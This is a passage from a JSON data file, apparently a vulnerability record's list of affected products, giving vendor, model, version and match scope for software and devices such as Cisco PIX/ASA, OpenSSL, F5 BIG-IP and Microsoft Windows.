"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "linux enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "9"
},
{
"_id": null,
"model": "esx server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "3.0.3"
},
{
"_id": null,
"model": "hp-ux b.11.11",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "windows server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "security agent for ipcc enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.639"
},
{
"_id": null,
"model": "application server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.2.3"
},
{
"_id": null,
"model": "opensolaris build snv 94",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.3"
},
{
"_id": null,
"model": "enterprise linux es extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "novell linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9.0"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.2"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2.15)"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3"
},
{
"_id": null,
"model": "windows server itanium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"_id": null,
"model": "arubaos 3.3.2.14-fips",
"scope": null,
"trust": 0.3,
"vendor": "arubanetworks",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.01"
},
{
"_id": null,
"model": "wanjet",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.0.2"
},
{
"_id": null,
"model": "aura presence services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.2.5"
},
{
"_id": null,
"model": "unified communications manager sr4",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.2.8"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.4"
},
{
"_id": null,
"model": "project openssl h",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "systems insight manager update",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.31"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0.0x64"
},
{
"_id": null,
"model": "circle",
"scope": "ne",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1.38"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.5"
},
{
"_id": null,
"model": "cosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "project openssl i",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "opensolaris build snv 01",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "wireless control system for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "ucosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "ironport web security appliance s-series",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3.3"
},
{
"_id": null,
"model": "oracle10g personal edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4"
},
{
"_id": null,
"model": "project proftpd",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3.2"
},
{
"_id": null,
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "windows vista beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "1"
},
{
"_id": null,
"model": "etherfast befvp41 router",
"scope": null,
"trust": 0.3,
"vendor": "linksys",
"version": null
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.3"
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "4.0.1"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.4"
},
{
"_id": null,
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.4.6"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.9"
},
{
"_id": null,
"model": "java se sr7",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux es",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "opensolaris build snv 76",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "web server 4.3r4",
"scope": null,
"trust": 0.3,
"vendor": "zeus",
"version": null
},
{
"_id": null,
"model": "windows xp professional edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "x64"
},
{
"_id": null,
"model": "project openssl c",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.1.1"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5"
},
{
"_id": null,
"model": "7.0-release",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 101a",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "java system web server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.0.6"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.3"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"_id": null,
"model": "opensolaris build snv 87",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows xp professional sp3",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"_id": null,
"model": "appliance server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "2.0"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.5.2"
},
{
"_id": null,
"model": "opensolaris build snv 113",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0.193"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "arubaos 3.3.2.13-fips",
"scope": null,
"trust": 0.3,
"vendor": "arubanetworks",
"version": null
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.4.2"
},
{
"_id": null,
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.5"
},
{
"_id": null,
"model": "enterprise linux as for sap",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "windows terminal services sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.0.5"
},
{
"_id": null,
"model": "cosminexus studio",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "5"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.3.1"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.0.9"
},
{
"_id": null,
"model": "rsa data protection manager appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "emc",
"version": "3.5.1"
},
{
"_id": null,
"model": "opensolaris build snv 119",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.0"
},
{
"_id": null,
"model": "windows vista home basic 64-bit edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "blackberry enterprise server for novell groupwise",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.1"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.9"
},
{
"_id": null,
"model": "network security services",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12.5"
},
{
"_id": null,
"model": "enterprise linux extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "security agent for cvp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.14.5.1.573"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.10"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.8"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0"
},
{
"_id": null,
"model": "windows datacenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "unified communications manager 4.2 sr2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.47.1"
},
{
"_id": null,
"model": "interactive response",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.x"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)15"
},
{
"_id": null,
"model": "windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.5"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.3.1"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.3(2)"
},
{
"_id": null,
"model": "unified communications manager 4.3 sr1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "systems insight manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "system management homepage",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0"
},
{
"_id": null,
"model": "wanjet",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4.30)"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "unified ip phone 7961g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.9"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11302.0.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0"
},
{
"_id": null,
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.1.3"
},
{
"_id": null,
"model": "digital media player",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2)19"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.0.6"
},
{
"_id": null,
"model": "solaris 9 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 02",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "coat systems packetshaper",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "8.3.2"
},
{
"_id": null,
"model": "css11500 content services switch s",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.10"
},
{
"_id": null,
"model": "download accelarator",
"scope": "eq",
"trust": 0.3,
"vendor": "prozilla",
"version": "1.2.1"
},
{
"_id": null,
"model": "security agent",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0(2.099)"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.6.1"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.2"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.26"
},
{
"_id": null,
"model": "ucosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "integrated management suite",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "coat systems blue coat reporter",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "9.2.3.1"
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2.1"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.3"
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "unified ip phone 7970g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.26"
},
{
"_id": null,
"model": "systems insight manager sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4.9)"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3.2"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "11"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.1"
},
{
"_id": null,
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "websphere mq internet pass-thru",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2"
},
{
"_id": null,
"model": "java system directory server 2004q2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "7.2-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "arubaos",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.3.2.23"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.2.4"
},
{
"_id": null,
"model": "windows xp",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "messaging application server mm",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43"
},
{
"_id": null,
"model": "linux enterprise server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "messaging storage server mm3.0",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.1"
},
{
"_id": null,
"model": "ace application control engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "47000"
},
{
"_id": null,
"model": "jdk 1.5.0 07-b03",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 98",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "windows server r2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.7"
},
{
"_id": null,
"model": "windows server datacenter edition itanium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20030"
},
{
"_id": null,
"model": "messaging application server mm",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "security agent for cvp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.04.5.1.573"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"_id": null,
"model": "-release-p10",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.7"
},
{
"_id": null,
"model": "project openssl e",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.5"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.11"
},
{
"_id": null,
"model": "security agent for ipcc hosted",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.616"
},
{
"_id": null,
"model": "opensolaris build snv 22",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "matrix operating environment",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.3.1"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.4"
},
{
"_id": null,
"model": "enterprise linux sap",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "opensolaris build snv 81",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.5"
},
{
"_id": null,
"model": "opensolaris build snv 103",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows xp embedded sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "windows server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.9"
},
{
"_id": null,
"model": "software opera web browser beta",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.201"
},
{
"_id": null,
"model": "iis",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.5"
},
{
"_id": null,
"model": "unified ip phone 7971g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "windows vista beta",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.5"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1(1)"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "pfsense 1.2-rc2",
"scope": null,
"trust": 0.3,
"vendor": "bsdperimeter",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.21"
},
{
"_id": null,
"model": "windows vista enterprise",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.5"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2-2"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0"
},
{
"_id": null,
"model": "unified ip phone sccp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(8)"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.657"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "65003.1(17)"
},
{
"_id": null,
"model": "unified communications manager 4.3 sr.1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "java system web server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "34009.2.5"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.43.3"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(2)"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.3"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "10"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.5.1"
},
{
"_id": null,
"model": "windows xp media center edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 37",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project openssl beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.3"
},
{
"_id": null,
"model": "opensolaris build snv 115",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "db2 universal database fix pack 4a",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "download accelarator",
"scope": "eq",
"trust": 0.3,
"vendor": "prozilla",
"version": "1.3.2"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3.1"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1"
},
{
"_id": null,
"model": "enterprise linux desktop workstation client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "security agent for cvp",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.04.5.1.639"
},
{
"_id": null,
"model": "intuity audix lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "solaris 9 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project openssl m",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "65003.2(15)"
},
{
"_id": null,
"model": "java sdk sr13-fp1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.4.2"
},
{
"_id": null,
"model": "java system web server sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "project openssl b",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.2"
},
{
"_id": null,
"model": "windows server datacenter edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)30"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.7"
},
{
"_id": null,
"model": "unified contact center hosted",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(3)"
},
{
"_id": null,
"model": "blackberry enterprise server express for domino",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.4"
},
{
"_id": null,
